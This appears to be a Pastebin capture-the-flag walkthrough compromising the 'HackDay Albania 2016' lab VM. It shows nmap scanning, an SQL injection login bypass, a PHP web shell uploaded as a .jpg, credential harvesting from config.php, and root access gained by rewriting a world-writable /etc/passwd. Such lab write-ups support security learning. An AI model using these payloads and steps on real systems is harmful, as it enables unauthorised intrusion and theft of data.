Guest User

Untitled

a guest
Nov 29th, 2016
481
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Let's check our virtual machine IP:
  2.  
  3. Currently scanning: 192.168.6.0/16 | Screen View: Unique Hosts
  4.  
  5. 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 84
  6. _____________________________________________________________________________
  7. IP At MAC Address Count Len MAC Vendor / Hostname
  8. -----------------------------------------------------------------------------
  9. 192.168.1.84 08:00:27:98:0d:5f 1 42 CADMUS COMPUTER SYSTEMS
  10. (...)
  11.  
  12.  
  13. # With that IP, let's scan it to check what's going on:
  14.  
  15. tlopes@blackbox:~$ nmap -p 1-65535 -v -A -T5 192.168.1.84
  16.  
  17. Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-28 00:02 WET
  18. NSE: Loaded 132 scripts for scanning.
  19. NSE: Script Pre-scanning.
  20. Initiating NSE at 00:02
  21. Completed NSE at 00:02, 0.00s elapsed
  22. Initiating NSE at 00:02
  23. Completed NSE at 00:02, 0.00s elapsed
  24. Initiating Ping Scan at 00:02
  25. Scanning 192.168.1.84 [2 ports]
  26. Completed Ping Scan at 00:02, 0.00s elapsed (1 total hosts)
  27. Initiating Parallel DNS resolution of 1 host. at 00:02
  28. Completed Parallel DNS resolution of 1 host. at 00:02, 0.03s elapsed
  29. Initiating Connect Scan at 00:02
  30. Scanning hackday.lan (192.168.1.84) [65535 ports]
  31. Discovered open port 22/tcp on 192.168.1.84
  32. Discovered open port 8008/tcp on 192.168.1.84
  33. Completed Connect Scan at 00:02, 1.44s elapsed (65535 total ports)
  34. Initiating Service scan at 00:02
  35. Scanning 2 services on hackday.lan (192.168.1.84)
  36. Completed Service scan at 00:02, 6.02s elapsed (2 services on 1 host)
  37. NSE: Script scanning 192.168.1.84.
  38. Initiating NSE at 00:02
  39. Completed NSE at 00:02, 0.51s elapsed
  40. Initiating NSE at 00:02
  41. Completed NSE at 00:02, 0.00s elapsed
  42. Nmap scan report for hackday.lan (192.168.1.84)
  43. Host is up (0.0060s latency).
  44. Not shown: 65533 closed ports
  45. PORT STATE SERVICE VERSION
  46. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
  47. | ssh-hostkey:
  48. | 2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
  49. |_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
  50. 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
  51. | http-methods:
  52. |_ Supported Methods: GET HEAD POST OPTIONS
  53. | http-robots.txt: 26 disallowed entries (15 shown)
  54. | /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
  55. | /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
  56. | /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
  57. |_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
  58. |_http-server-header: Apache/2.4.18 (Ubuntu)
  59. |_http-title: HackDay Albania 2016
  60. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  61.  
  62. NSE: Script Post-scanning.
  63. Initiating NSE at 00:02
  64. Completed NSE at 00:02, 0.00s elapsed
  65. Initiating NSE at 00:02
  66. Completed NSE at 00:02, 0.00s elapsed
  67. Read data files from: /usr/bin/../share/nmap
  68. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  69. Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
  70. tlopes@blackbox:~$
  71.  
  72.  
  73. -- we can see 2 different services running at ports 8008 (http) and 22 (ssh)
  74.  
  75. # Robots.txt shows a lot of disallowed entries, let's check what's there:
  76.  
  77. tlopes@blackbox:~$ for i in `curl 192.168.1.84:8008/robots.txt | cut -d: -f2`; do echo "======"; echo "Folder: $i"; curl "192.168.1.84:8008$i"; echo ""; done;
  78. % Total % Received % Xferd Average Speed Time Time Time Current
  79. Dload Upload Total Spent Left Speed
  80. 100 702 100 702 0 0 307k 0 --:--:-- --:--:-- --:--:-- 685k
  81. ======
  82. Folder: /rkfpuzrahngvat/
  83. <!DOCTYPE html>
  84. <html lang="en">
  85. <head>
  86. <meta charset="UTF-8">
  87. <title>Hmmmm????</title>
  88. </head>
  89. <body>
  90. <center><img src="background.jpg"></center>
  91. </body>
  92. </html>
  93. ======
  94. Folder: /slgqvasbiohwbu/
  95. <!DOCTYPE html>
  96. <html lang="en">
  97. <head>
  98. <meta charset="UTF-8">
  99. <title>Hmmmm????</title>
  100. </head>
  101. <body>
  102. <center><img src="background.jpg"></center>
  103. </body>
  104. </html>
  105. ======
  106. Folder: /tmhrwbtcjpixcv/
  107.  
  108. (...)
  109.  
  110. ======
  111. Folder: /unisxcudkqjydw/
  112. IS there any /vulnbank/ in there ???
  113.  
  114. ======
  115.  
  116. # Opening http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/" and then going to "client/login.php"
  117. -- it was possible to see a login form
  118.  
  119. # Submitting the form with variable names changed to Arrays username[] and password[] gave the following error:
  120.  
  121. Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
  122. Notice: Array to string conversion in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 101
  123. Invalid Credentials . . .
  124.  
  125. -- I tried with some variants but nothing special happened
  126.  
  127. # I've executed hydra to try some user/pass combinations but without luck
  128. hydra 192.168.122.95 -s 8008 http-post-form "/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid"
  129.  
  130. # At the same time, I've executed sqlmap that found one blind injection ..
  131. -- haven't luck on putting sqlmap owning the database for me, so I did it for myself:
  132. .. after some tries.. I was able to bypass the form using the following combination:
  133.  
  134. username: ' or 'a' = 'a' --
  135. password: #
  136.  
  137. # On the new page there's a "Contact Support" form
  138. -- I tried to upload a .php file but it failed (only images allowed)
  139. -- so I renamed the file to .jpg and it worked!
  140.  
  141. tlopes@blackbox:~$ cat shell.jpg
  142. <?php
  143. system($_GET['cmd']);
  144.  
  145. # Testing the PHP:
  146.  
  147. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=id
  148. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  149.  
  150. # It worked! local access to the shell
  151.  
  152. # Checking what's going on the current dir
  153.  
  154. -- http://192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-al
  155. total 52
  156. drwxrwxr-x 4 taviso taviso 4096 Oct 20 12:28 .
  157. drwxrwxr-x 3 taviso taviso 4096 Oct 20 12:31 ..
  158. -rwxr-xr-x 1 taviso taviso 87 Oct 19 08:31 client.php
  159. -rwxr-xr-x 1 taviso taviso 4137 Oct 20 12:27 config.php
  160. drwxr-xr-x 2 taviso taviso 4096 Oct 19 08:15 images
  161. -rwxr-xr-x 1 taviso taviso 403 May 23 2016 index.php
  162. -rwxr-xr-x 1 taviso taviso 348 Oct 20 11:58 login.php
  163. -rwxr-xr-x 1 taviso taviso 81 May 22 2016 logout.php
  164. -rwxr-xr-x 1 taviso taviso 1198 Oct 20 12:28 ticket.php
  165. drwxrwxrwx 2 taviso taviso 4096 Nov 28 01:17 upload
  166. -rwxr-xr-x 1 taviso taviso 532 Oct 19 08:29 view_file.php
  167. -rwxr-xr-x 1 taviso taviso 1029 Oct 19 08:29 view_ticket.php
  168.  
  169. # Checking the config.php
  170.  
  171. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20config.php
  172. (...)
  173. $db_host = "127.0.0.1";
  174. $db_name = "bank_database";
  175. $db_user = "root";
  176. $db_password = "NuCiGoGo321";
  177. (...)
  178.  
  179. # Dumpping all databases:
  180.  
  181. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=mysqldump%20-uroot%20-pNuCiGoGo321%20--all-databases
  182. Nothing relevant on the dump
  183.  
  184. # ps axu, init.d, cron.d and other relevant folders didn't returned anything valuable to attack
  185.  
  186. # Tried to exploit mysqld with race conditions to escalate privileges, but it failed due permissions
  187.  
  188. # After some time searching configurations I've found out that passwd was with write permissions:
  189. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=ls%20-alhtr%20/etc%20|%20grep%20passwd
  190. -rw------- 1 root root 1.6K Oct 9 13:13 passwd-
  191. -rw-r--rw- 1 root root 1.6K Oct 22 17:21 passwd
  192.  
  193.  
  194. # Listing all users available:
  195. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd
  196.  
  197. root:x:0:0:root:/root:/bin/bash
  198. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  199. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  200. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  201. sync:x:4:65534:sync:/bin:/bin/sync
  202. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  203. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  204. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  205. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  206. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  207. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  208. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  209. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  210. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  211. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  212. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  213. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  214. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  215. systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
  216. systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
  217. systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  218. systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
  219. syslog:x:104:108::/home/syslog:/bin/false
  220. _apt:x:105:65534::/nonexistent:/bin/false
  221. lxd:x:106:65534::/var/lib/lxd/:/bin/false
  222. mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
  223. messagebus:x:108:112::/var/run/dbus:/bin/false
  224. uuidd:x:109:113::/run/uuidd:/bin/false
  225. dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  226. sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
  227. taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash
  228.  
  229.  
  230. # Let's try to change "taviso" account to a known password
  231. -- first simulating it in my own computer:
  232.  
  233. tlopes@blackbox:~$ sudo adduser deleteme
  234. [sudo] password for tlopes:
  235. Adding user `deleteme' ...
  236. Adding new group `deleteme' (1001) ...
  237. Adding new user `deleteme' (1001) with group `deleteme' ...
  238. Creating home directory `/home/deleteme' ...
  239. Copying files from `/etc/skel' ...
  240. Enter new UNIX password:
  241. Retype new UNIX password:
  242. passwd: password updated successfully
  243. Changing the user information for deleteme
  244. Enter the new value, or press ENTER for the default
  245. Full Name []:
  246. Room Number []:
  247. Work Phone []:
  248. Home Phone []:
  249. Other []:
  250. Is the information correct? [Y/n]
  251.  
  252. tlopes@blackbox:~$ sudo cat /etc/shadow | grep deleteme
  253. deleteme:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:17133:0:99999:7::
  254.  
  255. # Let's use the previous hash as support to create the new "taviso" entry:
  256.  
  257. taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
  258.  
  259.  
  260. # Now, let's remove taviso from /etc/passwd
  261. 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=sed%20%27/taviso/d%27%20/etc/passwd%20>%20/tmp/passwd.bk
  262. 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cp%20/tmp/passwd.bk%20/etc/passwd
  263.  
  264. # And add our new "taviso" created in previous step:
  265.  
  266. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=echo%20%27taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash%27%20%3E%3E%20/etc/passwd
  267.  
  268. # Confirming if everything went ok:
  269. -- 192.168.1.84:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.jpg&cmd=cat%20/etc/passwd%20|%20grep%20taviso
  270.  
  271. Yup, the account it's there with our password "password"
  272.  
  273. taviso:$6$FlRgAWpu$XTECIpCMZIBy0nUexpRKQLXa70T9qx5td4eQbljc48.S/es3.TiI0DvPD3INXBIKn4k95ke/pRmjF.Aw5N3du/:1000:1000:Taviso,,,:/home/taviso:/bin/bash
  274.  
  275. # Now let's try to connect using SSH to this account:
  276.  
  277. tlopes@blackbox:~$ ssh taviso@192.168.1.84
  278. The authenticity of host '192.168.1.84 (192.168.1.84)' can't be established.
  279. ECDSA key fingerprint is SHA256:IWIi1cnAziEW50tRA6HT1S4Zp/bo+pjpAvJ3FddNSOE.
  280. Are you sure you want to continue connecting (yes/no)? yes
  281. Warning: Permanently added '192.168.1.84' (ECDSA) to the list of known hosts.
  282. taviso@192.168.1.84's password:
  283. Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)
  284.  
  285. * Documentation: https://help.ubuntu.com
  286. * Management: https://landscape.canonical.com
  287. * Support: https://ubuntu.com/advantage
  288.  
  289. 36 packages can be updated.
  290. 2 updates are security updates.
  291.  
  292.  
  293. *** System restart required ***
  294. Last login: Sat Oct 29 23:07:00 2016
  295. -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
  296. taviso@hackday:~$
  297.  
  298.  
  299. -- BAM!
  300.  
  301. # Let's see if taviso is on sudoers file :
  302.  
  303. taviso@hackday:~$ sudo -i
  304. [sudo] password for taviso:
  305. -bash: warning: setlocale: LC_CTYPE: cannot change locale (pt_PT.UTF-8)
  306. root@hackday:~#
  307.  
  308. -- BAM!
  309.  
  310. # Let's see what root has on his home dir
  311.  
  312. root@hackday:~#ls -al
  313. total 28
  314. drwx------ 3 root root 4096 Oct 22 17:21 .
  315. drwxr-xr-x 23 root root 4096 Nov 28 01:02 ..
  316. -rw------- 1 root root 58 Oct 22 17:21 .bash_history
  317. -rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
  318. drwxr-xr-x 2 root root 4096 Oct 9 13:18 .nano
  319. -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
  320. -rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt
  321.  
  322. -- BAM! a flag :)
  323.  
  324. root@hackday:~# cat flag.txt
  325. Urime,
  326. Tani nis raportin!
  327.  
  328. d5ed38fdbf28bc4e58be142cf5a17cf5
RAW Paste Data